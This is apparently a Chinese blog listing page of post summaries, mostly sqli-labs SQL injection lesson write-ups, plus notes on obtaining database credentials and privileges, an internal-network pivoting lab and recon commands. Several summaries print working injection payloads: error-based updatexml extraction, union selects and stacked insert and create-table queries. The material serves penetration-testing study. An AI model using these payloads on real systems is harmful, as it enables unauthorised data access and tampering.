上一页 1 ··· 8 9 10 11 12 13 14 15 下一页
摘要: 0x00数据库帐号密码获取方式 数据库帐号密码获取方式: 1.网站存在高权限SQL注入点 2.数据库的存储文件或备份文件 3.网站源码中的数据库配置文件(常见方式) 4.采用工具或脚本爆破(需解决外联问题) 1.高权限sql注入点 所有的mysql用户都在mysql的user表中 5' union 阅读全文
posted @ 2023-03-18 20:25 mushangqiujin 阅读(46) 评论(0) 推荐(0)
摘要: lesson-61 ?id=1' ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') 阅读全文
posted @ 2023-03-17 19:47 mushangqiujin 阅读(3) 评论(0) 推荐(0)
摘要: lesson56 ?id=1' ?id=1'-- + ?id=1')-- + ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenge 阅读全文
posted @ 2023-03-15 18:28 mushangqiujin 阅读(7) 评论(0) 推荐(0)
摘要: 0x00 权限的介绍 权限划分: 后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等 权限获取方法: 后台权限:弱口令,sql注入,数据库配置文件泄露,源码泄露 web权限:RCE,文件操作,反序列化,sql注入 数据库权限:数据库配置文件泄露,sql注入,后台或web权限转入 接口权限 阅读全文
posted @ 2023-03-15 17:48 mushangqiujin 阅读(24) 评论(0) 推荐(0)
摘要: 0x00 cfs三层内网基本环境介绍及配置 hacker主机能ping通centos,centos能ping通unbuntun,,unbtun能ping通win7,内网centos,unbuntu有两张网卡,在vmare通过虚拟网络编辑器新建三张网卡,关闭dhcp服务,一定要注意取消将主机虚拟适配器 阅读全文
posted @ 2023-03-14 20:58 mushangqiujin 阅读(23) 评论(0) 推荐(0)
摘要: 1.lesson-51 报错注入 判断注入: 单引号注入 查数据库: ?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- + 宽字节注入: ?sort=1';create table h like users;-- 阅读全文
posted @ 2023-03-13 20:37 mushangqiujin 阅读(5) 评论(0) 推荐(0)
摘要: 网络信息 window: ipconfig ipconfig/all route print #查看路由信息 linux: ifconfig ifconfig | more #当有很多网卡时,可以这样查看 ifconfig >1. txt #当有很多网卡时,可以这样查看 head -n 10 1. 阅读全文
posted @ 2023-03-12 15:12 mushangqiujin 阅读(7) 评论(0) 推荐(0)
摘要: 1.lesson-46 报错注入 判断注入: 整型注入 一部分代码,是是查询的排序语句,所以不能用union select 联合查询 SELECT * FROM users ORDER BY $id 查数据库名: ?sort=1 and updatexml(1,concat(0x7e,(select 阅读全文
posted @ 2023-03-12 11:21 mushangqiujin 阅读(7) 评论(0) 推荐(0)
摘要: lesson-41 宽字节注入 判断注入: ?id=1 and sleep(3) 插入数据: ?id=1;insert into users (username,password) values ('44','55'); 或union select注入: -1 union select 1,2,da 阅读全文
posted @ 2023-03-07 18:52 mushangqiujin 阅读(8) 评论(0) 推荐(0)
摘要: #include <stdio.h> int main(void){ int a; scanf("%d",&a); printf("%d",a); return 0; } &符号作用是把键盘中输入的值给变量a,使用scanf()时输入数值,需要按一下enter键,主要是为了告诉程序我已经输入完了 如 阅读全文
posted @ 2023-03-07 17:42 mushangqiujin 阅读(22) 评论(0) 推荐(0)
上一页 1 ··· 8 9 10 11 12 13 14 15 下一页